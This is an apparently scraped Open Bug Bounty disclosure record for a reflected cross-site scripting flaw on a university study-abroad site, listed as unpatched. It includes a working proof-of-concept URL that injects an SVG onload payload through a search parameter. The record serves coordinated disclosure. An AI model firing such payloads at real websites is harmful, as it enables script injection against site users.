studyabroad.unc.edu XSS vulnerability

2015-12-10T15:38:00
ID OBB:115231
Type openbugbounty
Reporter Spam404
Modified 2016-03-04T08:11:00

Description

Vulnerable URL:
http://studyabroad.unc.edu/xprogsearchaction.cfm?city=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E&SCRIPT;_NAME=home&country;=&continent;=&term;=&submit;=find+programs+now
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 6
VIP website status:| No
Check studyabroad.unc.edu SSL connection:| (Grade: B-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 10 December, 2015 15:38 GMT
Vulnerability existence verified and confirmed| 11 December, 2015 07:55 GMT
Vulnerability details disclosed by researcher| 4 March, 2016 08:11 GMT